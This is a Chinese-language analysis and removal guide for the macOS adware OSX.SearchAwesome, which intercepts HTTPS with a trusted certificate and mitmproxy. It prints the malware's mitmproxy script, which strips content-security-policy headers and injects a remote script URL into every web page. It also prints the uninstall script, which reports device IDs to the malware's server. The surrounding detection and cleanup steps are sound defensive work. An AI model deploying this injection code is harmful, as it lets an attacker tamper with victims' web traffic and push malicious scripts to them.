OSX.SearchAwesome 恶意软件分析与防御指南<\/h1>

一、恶意软件概述<\/h2>
OSX.SearchAwesome 是一款针对 macOS 系统的广告注入恶意软件，能够拦截加密的 web 流量并进行中间人攻击(MitM)。该恶意软件通过伪装成正常图像文件进行传播，安装后会在受害者访问的每个网页中注入恶意脚本。<\/p>

二、安装机制分析<\/h2>

1. 安装过程特征<\/h3>

伪装成普通图像文件，没有合法安装器的界面<\/li>

采用静默安装方式，用户仅能看到两个认证请求：

请求授权改变证书信任设置(Certificate Trust Settings)<\/li>

请求允许修改网络配置(SPI)<\/li> <\/ul> <\/li> <\/ul>

2. 安装组件<\/h3>

恶意软件会安装以下组件：<\/p>

\/Applications\/spi.app<\/code> - 主程序<\/li>
~\/Library\/LaunchAgents\/spid-uninstall.plist<\/code> - 卸载监控代理<\/li>

~\/Library\/LaunchAgents\/spid.plist<\/code> - 启动代理<\/li>
<\/ul>
三、恶意行为分析<\/h2>
1. 持久化机制<\/h3>

spid.plist<\/code> 代理用于启动 spi.app<\/li>
如果用户强制退出应用，需重启或重新登录才会再次启动<\/li>
<\/ul>
2. 自保护机制<\/h3>

spid-uninstall.plist<\/code> 监控 spi.app 的移除<\/li>
当检测到主程序被删除时，会自动移除其他组件<\/li>
<\/ul>
3. 中间人攻击(MitM)实现<\/h3>


证书安装<\/strong>：<\/p>

安装恶意证书，使系统信任攻击者<\/li>
获取 HTTPS 流量访问权限<\/li>
<\/ul>
<\/li>

使用 mitmproxy<\/strong>：<\/p>

安装开源工具 mitmproxy 拦截、检查和修改 web 流量<\/li>
能够处理加密的 HTTPS 流量<\/li>
<\/ul>
<\/li>
<\/ol>
4. 广告注入机制<\/h3>
通过 inject.py<\/code> 脚本实现网页内容修改：<\/p>
from<\/span> mitmproxy import<\/span> http
<\/span><\/span>
<\/span><\/span>def<\/span> response<\/span>(flow: http.<\/span>HTTPFlow) -><\/span> None<\/span>:
<\/span><\/span>    if<\/span> flow.<\/span>response.<\/span>status_code ==<\/span> 200<\/span>:
<\/span><\/span>        if<\/span> "text\/html"<\/span> in<\/span> flow.<\/span>response.<\/span>headers["content-type"<\/span>]:
<\/span><\/span>            flow.<\/span>response.<\/span>headers.<\/span>pop("content-security-policy"<\/span>, None<\/span>)
<\/span><\/span>            flow.<\/span>response.<\/span>headers.<\/span>pop("content-security-policy-report-only"<\/span>, None<\/span>)
<\/span><\/span>            script_url =<\/span> "https:\/\/chaumonttechnology.com\/ia\/script\/d.php?uid=d7a477399cd589dcfe240e9f5c3398e2&a=3675&v=a1.0.0.25"<\/span>
<\/span><\/span>            html =<\/span> flow.<\/span>response.<\/span>content
<\/span><\/span>            html =<\/span> html.<\/span>decode().<\/span>replace("<\/body>"<\/span>, "http:\/\/+script_url+<\/body>"<\/span>)
<\/span><\/span>            flow.<\/span>response.<\/span>content =<\/span> str(html).<\/span>encode("utf8"<\/span>)
<\/span><\/span><\/code><\/pre>
移除内容安全策略(CSP)头<\/li>
在每个页面的 <\/body><\/code> 标签前注入恶意脚本<\/li>
<\/ul>
5. 卸载行为<\/h3>
当检测到主程序被移除时执行的脚本：<\/p>
if<\/span> ! [<\/span> -d "\/Applications\/spi.app"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>    networksetup -setwebproxystate "Wi-Fi"<\/span> off
<\/span><\/span>    networksetup -setsecurewebproxystate "Wi-Fi"<\/span> off
<\/span><\/span>    networksetup -setwebproxystate "Ethernet"<\/span> off
<\/span><\/span>    networksetup -setsecurewebproxystate "Ethernet"<\/span> off
<\/span><\/span>    VERSION=<\/span>$(<\/span>defaults read com.searchpage.spi version)<\/span>
<\/span><\/span>    AID=<\/span>$(<\/span>defaults read com.searchpage.spi aid)<\/span>
<\/span><\/span>    UNIQUE_ID=<\/span>$(<\/span>defaults read com.searchpage.spi unique_id)<\/span>
<\/span><\/span>    curl "http:\/\/www.searchawesome.net\/uninstall.php?un=1&v=<\/span>$VERSION&reason=&unique_id=<\/span>$UNIQUE_ID&aid=<\/span>$AID"<\/span>
<\/span><\/span>    defaults delete com.searchpage.spi
<\/span><\/span>    defaults delete com.searchpage.spiinstall
<\/span><\/span>    rm ~\/Library\/LaunchAgents\/spid-uninstall.plist
<\/span><\/span>    rm ~\/Library\/LaunchAgents\/spid.plist
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>
关闭代理设置<\/li>
发送卸载信息到服务器<\/li>
删除配置文件和启动代理<\/li>
<\/ul>
四、潜在危害<\/h2>


当前威胁<\/strong>：<\/p>

广告注入影响用户体验<\/li>
隐私泄露风险<\/li>
<\/ul>
<\/li>

未来可能威胁<\/strong>：<\/p>

重定向到钓鱼网站<\/li>
窃取用户数据<\/li>
加密货币挖矿<\/li>
键盘记录<\/li>
其他恶意代码注入<\/li>
<\/ul>
<\/li>

残留风险<\/strong>：<\/p>

遗留的 MitM 工具可能被其他恶意软件利用<\/li>
未移除的 mitmproxy 组件<\/li>
<\/ul>
<\/li>
<\/ol>
五、检测与清除指南<\/h2>
1. 感染指标(IoC)<\/h3>
检查系统中是否存在以下文件：<\/p>

\/Applications\/spi.app<\/code><\/li>
~\/Library\/LaunchAgents\/spid-uninstall.plist<\/code><\/li>
~\/Library\/LaunchAgents\/spid.plist<\/code><\/li>
~\/Library\/SPI\/<\/code><\/li>
~\/.mitmproxy\/<\/code> (mitmproxy 安装标志)<\/li>
<\/ul>
2. 手动清除步骤<\/h3>


移除主程序<\/strong>：<\/p>
rm -rf \/Applications\/spi.app
<\/span><\/span><\/code><\/pre><\/li>

删除启动代理<\/strong>：<\/p>
rm ~\/Library\/LaunchAgents\/spid-uninstall.plist
<\/span><\/span>rm ~\/Library\/LaunchAgents\/spid.plist
<\/span><\/span><\/code><\/pre><\/li>

清理 SPI 目录<\/strong>：<\/p>
rm -rf ~\/Library\/SPI\/
<\/span><\/span><\/code><\/pre><\/li>

移除 mitmproxy 证书<\/strong>：<\/p>

打开"钥匙串访问"应用<\/li>
搜索并删除所有与 mitmproxy 相关的证书<\/li>
<\/ul>
<\/li>

检查并重置网络设置<\/strong>：<\/p>
networksetup -setwebproxystate "Wi-Fi"<\/span> off
<\/span><\/span>networksetup -setsecurewebproxystate "Wi-Fi"<\/span> off
<\/span><\/span>networksetup -setwebproxystate "Ethernet"<\/span> off
<\/span><\/span>networksetup -setsecurewebproxystate "Ethernet"<\/span> off
<\/span><\/span><\/code><\/pre><\/li>

删除偏好设置<\/strong>：<\/p>
defaults delete com.searchpage.spi
<\/span><\/span>defaults delete com.searchpage.spiinstall
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. 安全建议<\/h3>

不要使用恶意软件提供的卸载服务<\/li>
使用专业安全软件进行全面扫描<\/li>
定期检查系统是否有异常行为<\/li>
谨慎处理系统权限请求，特别是涉及证书和网络设置的请求<\/li>
<\/ul>
六、防御措施<\/h2>


预防措施<\/strong>：<\/p>

仅从可信来源下载软件<\/li>
警惕伪装成图像或其他非可执行文件的应用程序<\/li>
注意系统权限请求，特别是证书和网络设置相关请求<\/li>
<\/ul>
<\/li>

技术防护<\/strong>：<\/p>

启用防火墙和实时防护<\/li>
定期更新系统和安全软件<\/li>
使用内容安全策略(CSP)保护的浏览器<\/li>
<\/ul>
<\/li>

监控措施<\/strong>：<\/p>

定期检查 \/Library\/LaunchAgents\/<\/code> 和 ~\/Library\/LaunchAgents\/<\/code> 目录<\/li>
监控网络流量异常<\/li>
检查浏览器中是否有未知证书<\/li>
<\/ul>
<\/li>
<\/ol>
七、总结<\/h2>
OSX.SearchAwesome 是一款利用 MitM 技术进行广告注入的 macOS 恶意软件，其特点是：<\/p>

伪装性强，安装过程隐蔽<\/li>
使用合法开源工具 mitmproxy 实施攻击<\/li>
能够绕过 HTTPS 加密<\/li>
具有自保护和卸载机制<\/li>
潜在危害大，可升级为更严重的威胁<\/li>
<\/ul>
用户应提高安全意识，采取多层防御措施，及时发现和处理此类威胁。<\/p>